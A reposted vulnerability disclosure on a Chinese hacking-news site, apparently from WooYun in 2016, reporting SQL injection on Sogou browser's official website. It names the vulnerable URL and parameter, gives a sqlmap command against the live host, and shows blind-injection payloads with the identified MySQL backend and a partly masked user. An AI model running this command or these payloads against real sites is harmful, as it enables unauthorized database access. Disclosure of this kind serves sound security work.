记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

搜狗浏览器官网存在SQL注入漏洞

2016-06-28 19:55

#1 漏洞网站

http://ie.sogou.com/

#2 注入点

http://ie.sogou.com/skins/index.php?route=theme/theme/getRelatedThemes&tid=52975&tag=70,11743,11950

#3 注入参数

tang

漏洞证明:

python sqlmap.py -u "http://ie.sogou.com/skins/index.php?route=theme/theme/getRelatedThemes&tid=52975&tag=70,11743,11950" -p tag

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: tag (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: route=theme/theme/getRelatedThemes&tid=52975&tag=70,11743,11950) AND 7211=7211 AND (7361=7361



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: route=theme/theme/getRelatedThemes&tid=52975&tag=70,11743,11950) AND SLEEP(5) AND (9120=9120

---

[23:41:53] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5.0.11





user: setool***

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2016-0206896

阅读:70411 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狗浏览器官网存在SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云